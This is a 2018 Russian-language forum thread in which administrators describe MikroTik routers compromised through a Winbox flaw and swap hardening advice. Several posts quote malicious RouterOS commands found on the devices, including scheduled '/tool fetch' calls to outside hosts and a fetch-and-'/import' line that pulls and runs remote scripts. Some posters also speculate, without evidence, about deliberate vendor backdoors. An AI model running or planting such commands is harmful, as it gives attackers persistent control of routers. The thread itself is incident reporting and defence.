uraso Posted August 3, 2018 (edited) · Report post Вчера , проверяя свой домашний тестовый RB750G обнаружил странные записи в логах и скрипт в system script /tool fetch address=95.154.216.167 port=2008 src-path=/mikrotik.php mode=http keep-result=no который выполнялся через шедуллер через каждые 30 секунд. Прошивка была старая 6.37.5 .... Гугл не заставил себя долго ждать - на официальном сайте микротик уже уведомлены об этом. Обновился до 6.40.8 . сменил пароль.... скрипт удалил.... Отключил по совету с форума IP/Socks.... Позвонил знакомый и сообщил что такой же скрипт обнаружил у себя .... с прошивкой 6.41.1.... Не оставили ли они еще какой то заразы в микротике? https://forum.mikrotik.com/viewtopic.php?t=137217&sid=d37ca2abda66df9f536db5c282ad1c85 Кстати первое правило ip firewall filter add action=drop chain=input comment="" dst-port=53 in-interface=wan \ protocol=udp было не активно.... Edited August 3, 2018 by uraso Вставить ник Quote Ответить с цитированием Share this post Link to post Share on other sites More sharing options...
Lerych63 Posted August 3, 2018 · Report post Аналогично.. Обнаружил в скриптах /tool fetch address=95.154.216.166 port=2008 src-path=/mikrotik.php mode=http keep-result=no Воткнут от имени учётки,пароль и юзер не то что бы сложный но не типичный,брутом не прокатит. Чую 53й Вставить ник Quote Ответить с цитированием Share this post Link to post Share on other sites More sharing options...
McSea Posted August 3, 2018 (edited) · Report post @Lerych63 Используется дырка в winbox, закрытая обновлением от 24 апреля. Порт 8291, и для обнаружения используется порт 80. Обновитесь до 6.40.8 или 6.42.6. И файрвол настройте уже нормально один раз, я ж давал конфиг в соседней теме. В правильном конфиге должно быть закрыто ВСЕ, кроме того, что НУЖНО. Edited August 3, 2018 by McSea Вставить ник Quote Ответить с цитированием Share this post Link to post Share on other sites More sharing options...
Saab95 Posted August 3, 2018 · Report post Достаточно в IP-Services отключить все не нужное, а у нужного указать диапазоны IP, и никто ничего не сломает даже на старых прошивках. Вставить ник Quote Ответить с цитированием Share this post Link to post Share on other sites More sharing options...
alex8031 Posted September 7, 2018 · Report post В 03.08.2018 в 11:03, uraso сказал: Вчера , проверяя свой домашний тестовый RB750G обнаружил странные записи в логах и скрипт в system script /tool fetch address=95.154.216.167 port=2008 src-path=/mikrotik.php mode=http keep-result=no который выполнялся через шедуллер через каждые 30 секунд. Прошивка была старая 6.37.5 .... Гугл не заставил себя долго ждать - на официальном сайте микротик уже уведомлены об этом. Обновился до 6.40.8 . сменил пароль.... скрипт удалил.... Отключил по совету с форума IP/Socks.... Позвонил знакомый и сообщил что такой же скрипт обнаружил у себя .... с прошивкой 6.41.1.... Не оставили ли они еще какой то заразы в микротике? https://forum.mikrotik.com/viewtopic.php?t=137217&sid=d37ca2abda66df9f536db5c282ad1c85 Кстати первое правило ip firewall filter add action=drop chain=input comment="" dst-port=53 in-interface=wan \ protocol=udp было не активно.... Так похоже что новые прошивки дырявые на старых 5.26 и старше не единого взлома, а на новых одни проблемы и ни смена пароля настройки файервола ни закрытие 80 порта не даёт результата недавно пошла ещё одна гадость /tool fetch url=http://ciskotik.com/3.php mode=http dst-path=mikrotik.php /import mikrotik.php и новые микротики не всегда удается откатить на версию 5.26 Вставить ник Quote Ответить с цитированием Share this post Link to post Share on other sites More sharing options...
EShirokiy Posted September 7, 2018 · Report post @alex8031 6.42.7 проблем нет, пофиксили в версии 6.42.1 5.26 это некрофилия Вставить ник Quote Ответить с цитированием Share this post Link to post Share on other sites More sharing options...
alex8031 Posted September 8, 2018 · Report post 9 часов назад, EShirokiy сказал: @alex8031 6.42.7 проблем нет, пофиксили в версии 6.42.1 5.26 это некрофилия ну насчет 6.42.7 если сейчас нет то что будет через месяц два ??? как с предыдущими. а 5.26 почти сотня и ни один не взломан!!! а новые пару десятков и периодически появляется всякая ерунда если вовремя не убереш приходится ехать к клиенту и ресетить потому что закрвается весь доступ к устройству по всем протаколам. Вставить ник Quote Ответить с цитированием Share this post Link to post Share on other sites More sharing options...
EShirokiy Posted September 8, 2018 · Report post @alex8031 у меня ломали устройства на старых прошивках, нормально коннектился через мак-телнет. Каждый сам выбирает на каких прошивках сидеть, но на старых ПО и функционал хуже. Вставить ник Quote Ответить с цитированием Share this post Link to post Share on other sites More sharing options...
alex8031 Posted September 8, 2018 · Report post 1 час назад, EShirokiy сказал: @alex8031 у меня ломали устройства на старых прошивках, нормально коннектился через мак-телнет. Каждый сам выбирает на каких прошивках сидеть, но на старых ПО и функционал хуже. Конечно по мак адресу через телнет можно внутри провайдера и то далеко не всегда а если всё выключено кроме winbox и всё равно ломают видимо разработчик прошивок специально для каких то целей оставляет лазейку, и когда это становится известно посторонним начинаются массовые взломы. Видимо когда создавались старые прошивки не ставилась такая цель!!! А по функционалу пусть немного беднее зато надёжно... Вставить ник Quote Ответить с цитированием Share this post Link to post Share on other sites More sharing options...
McSea Posted September 8, 2018 (edited) · Report post 7 hours ago, alex8031 said: всё равно ломают видимо разработчик прошивок специально для каких то целей оставляет лазейку Какая лазейка ?? В конце апреля была выявлена конкретная уязвимость, позволяющая получить ВСЕ пароли через винбокс. В течение двух дней были выпущены фиксы в обеих ветках RouterOS. У вас сотня микротиков в управлении, надо же отслеживать регулярно новости по уязвимостям, я лично тут на форуме создавал в день анонса тему, не говоря уже про форум самих микротиков. Edited September 8, 2018 by McSea Вставить ник Quote Ответить с цитированием Share this post Link to post Share on other sites More sharing options...
nkusnetsov Posted September 9, 2018 · Report post @McSea здесь панику поднимают чукчи не читатели, чукчи - писатели. Вставить ник Quote Ответить с цитированием Share this post Link to post Share on other sites More sharing options...
Saab95 Posted September 9, 2018 · Report post Если микротик светит в интернет белым IP, то достаточно реализовать управление по VPN, то есть где то в центре стоит микротик, к нему подключаются все другие микротики через интернет, и в службах и у админов устанавливается ограничение доступа с IP = вашей серой подсети. Все, после этого никто взломать уже не сможет. Вставить ник Quote Ответить с цитированием Share this post Link to post Share on other sites More sharing options...
alex8031 Posted September 9, 2018 · Report post 2 часа назад, Saab95 сказал: Если микротик светит в интернет белым IP, то достаточно реализовать управление по VPN, то есть где то в центре стоит микротик, к нему подключаются все другие микротики через интернет, и в службах и у админов устанавливается ограничение доступа с IP = вашей серой подсети. Все, после этого никто взломать уже не сможет. Ну так понятно что микротик стоит на бело адресе но только одного не понятно как после апрельского затыкания дыр на новой прошивке в июле опять ломанули??? И второе ограничивать админку микротика одним адресом не всегда удобно Вероятно дырявая сама реализация протокола winbox в микротиках. Или же менять порт 8291 на какой нибудь другой может поможет. Вставить ник Quote Ответить с цитированием Share this post Link to post Share on other sites More sharing options...
straus Posted September 9, 2018 · Report post 20 минут назад, alex8031 сказал: Ну так понятно что микротик стоит на бело адресе но только одного не понятно как после апрельского затыкания дыр на новой прошивке в июле опять ломанули??? Как-как... Вы что думаете, когда я с полгода назад сказал, что микротик дырявый как друшлаг - я пошутил? Киевляне, которые нашли там не отдельную дыру, а функционально связанные лазейки, уже довольно давно начали делиться этим на хакерских форумах. Так что веселье ещё предстоит. Сейчас пока кто-то только использует отдельные дыры в своих целях, и не массово. Лично мне больше интересно узнать, это случайные дыры, или специально оставленные, потому что народ говорил, что по коду очень похоже на второе, правда непонятно зачем. Вставить ник Quote Ответить с цитированием Share this post Link to post Share on other sites More sharing options...
Saab95 Posted September 10, 2018 · Report post 11 часов назад, alex8031 сказал: И второе ограничивать админку микротика одним адресом не всегда удобно Вероятно дырявая сама реализация протокола winbox в микротиках. Или же менять порт 8291 на какой нибудь другой может поможет. Почему одним? Делаете доступ с серой сети, сами подключаетесь к роутеру по VPN. По поводу ломанули или нет - если в логах посмотрите, то там полно запросов подключения с ошибками логина и пароля, вот сидят и перебирают все комбинации. Вставить ник Quote Ответить с цитированием Share this post Link to post Share on other sites More sharing options...
alex8031 Posted September 11, 2018 · Report post В 10.09.2018 в 10:32, Saab95 сказал: Почему одним? Делаете доступ с серой сети, сами подключаетесь к роутеру по VPN. По поводу ломанули или нет - если в логах посмотрите, то там полно запросов подключения с ошибками логина и пароля, вот сидят и перебирают все комбинации. Да если бы они просто перебирали им бы лет на 500 точно хватило, столько не только люди но и микротики не живут. скорее то что написал постом выше straus!!! Вставить ник Quote Ответить с цитированием Share this post Link to post Share on other sites More sharing options...
maxkst Posted September 13, 2018 · Report post Зачем перебирать пароли, если эксплоиты выложены, просто подключаешься и получаешь их. Было тут и про утилиту RouterScan от Stas'M. Кто влип, ограничивайте доступ к винбокс порту только с локалки, проверьте скрипты ненужные, планировщик, фаервол, сокс и прокси, логгирование. Логи любят ограничивать до одной строчки ))). Можно так же посмотреть из любопытства последние команды в CLI, там много прикольного проскакивает. Вставить ник Quote Ответить с цитированием Share this post Link to post Share on other sites More sharing options...
Parrot Posted September 14, 2018 (edited) · Report post Ну вот и я наступил на грабли, вернее, их мне подложили. Прочитал про уязвимости циски и микротика еще в начале лета. Обновил еще тогда свой головной RB3011 до 6.40.9. И вот 2 дня назад получил "wrong username or password". LCD отключён. Пришлось делать netinstall, 6.43, полную перенастройку, т.к. бэкапа не было (он работал без всяких проблем уже 3-й год), вроде всё хорошо, заодно обновил знания и кое-что из настроек. Позакрывал все возможные дыры, как из рекомендаций, так и исходя из своих особенностей. Все сервисы кроме winbox закрыты, и тот доступен только из моей подсети и рабочего IP. 2 дня как бы всё ок, и тут сегодня опять "wrong username or password". No comments, одни мысли и те матом. LCD работает, даже конфиг могу reset, но мне здаётся, что дело не в бобине... По логам на LCD только мои неудачные попытки входа, больше ничего нет. Edited September 14, 2018 by Parrot Вставить ник Quote Ответить с цитированием Share this post Link to post Share on other sites More sharing options...
Trueno Posted September 14, 2018 · Report post 1 час назад, Parrot сказал: до 6.40.9 Так в этой проше вроде заделана дыра?! 1 час назад, Parrot сказал: Все сервисы кроме winbox закрыты, и тот доступен только из моей подсети и рабочего IP. Тем более... Что-то тут не то. Или нашлась новая дырка( Вставить ник Quote Ответить с цитированием Share this post Link to post Share on other sites More sharing options...
Parrot Posted September 14, 2018 · Report post Вот и у меня диссонанс на фоне вчерашнего ДР, когда перед ним я провозился почти 6 часов, заново настраивая эту шайтан-машину. Официальный форум микротик также мне пишет всякую хрень аля "вы учётные данные сменили при перепрошивке"? Вставить ник Quote Ответить с цитированием Share this post Link to post Share on other sites More sharing options...
alex8031 Posted September 14, 2018 · Report post Только что, Parrot сказал: Вот и у меня диссонанс на фоне вчерашнего ДР, когда перед ним я провозился почти 6 часов, заново настраивая эту шайтан-машину. Официальный форум микротик также мне пишет всякую хрень аля "вы учётные данные сменили при перепрошивке"? Ну только откатываться на 5,26 или старше у меня на этой ни один не сломали а новые кошмарят по чёрному такое впечатление что производитель этих железок нанял программистов и не заплатил людям за работу а те выложили на суд общественности дыры в прошивках?? Или есть другое мнение??? Вставить ник Quote Ответить с цитированием Share this post Link to post Share on other sites More sharing options...
Parrot Posted September 14, 2018 · Report post 34 минуты назад, alex8031 сказал: Или есть другое мнение??? Есть. Есть некая дыра, которую зловреды уже опять обнаружили, но официальный производитель признавать не торопится. Всяческие рекомендации, аля "прописать в firewall 100500 правил для защиты" - не комильфо (прописано 1050). Оборудование и софт по-умолчанию не должны быть открыты насквозь вдоль и поперёк. Если покупатель, сконфигурировав оборудование под свои нужды, должен еще прописать 100500 правил в фаерволе, то это кусок г-на на лопате, а не софт и hardware. Вставить ник Quote Ответить с цитированием Share this post Link to post Share on other sites More sharing options...
pppoetest Posted September 15, 2018 · Report post Лет 5 стоит штук 20 микр на сети, софт 5.25, 6 правил, никто не ломает. Вставить ник Quote Ответить с цитированием Share this post Link to post Share on other sites More sharing options...
Ferdin Posted September 15, 2018 · Report post вчера вечером опять была волна атак на микроты Вставить ник Quote Ответить с цитированием Share this post Link to post Share on other sites More sharing options...
saaremaa Posted September 15, 2018 · Report post 25 минут назад, Ferdin сказал: вчера вечером опять была волна атак на микроты какая версия? Вставить ник Quote Ответить с цитированием Share this post Link to post Share on other sites More sharing options...